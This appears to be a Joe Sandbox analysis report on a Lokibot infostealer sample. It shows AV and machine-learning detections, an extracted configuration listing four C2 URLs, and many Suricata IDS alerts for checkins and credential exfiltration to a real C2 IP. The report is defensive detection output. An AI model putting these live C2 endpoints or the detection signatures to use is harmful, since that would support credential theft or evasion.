2024-10-25T10:21:20.326057+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:21.441410+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:22.907366+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:24.073735+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:25.575978+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:26.705064+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:27.827107+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:28.952302+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:30.120093+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:31.244679+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:32.352236+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:33.496323+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:34.650472+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:35.782292+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:36.922599+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:38.071599+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:39.204843+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:40.499810+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:41.653914+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:42.775266+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:43.937769+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:45.077227+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:46.202323+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:47.377458+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:48.502508+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:49.659829+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:51.498324+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:52.518212+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:53.649173+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:54.809440+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:55.924734+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:57.172837+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:58.339192+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:59.527535+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:01.017571+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:02.183819+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:04.446102+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:05.576112+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:06.709690+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50102	94.156.177.220	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Avira: detected

Found malware configuration

Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

ReversingLabs: Detection: 97%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Joe Sandbox ML: detected

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49774
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49764
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49822 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49772
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49822 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49836 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49811 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49822 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49842 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49828 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49836 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49811 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49811 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49842 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49842 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49842 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49836 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49822 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49822 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 94.156.177.220:80
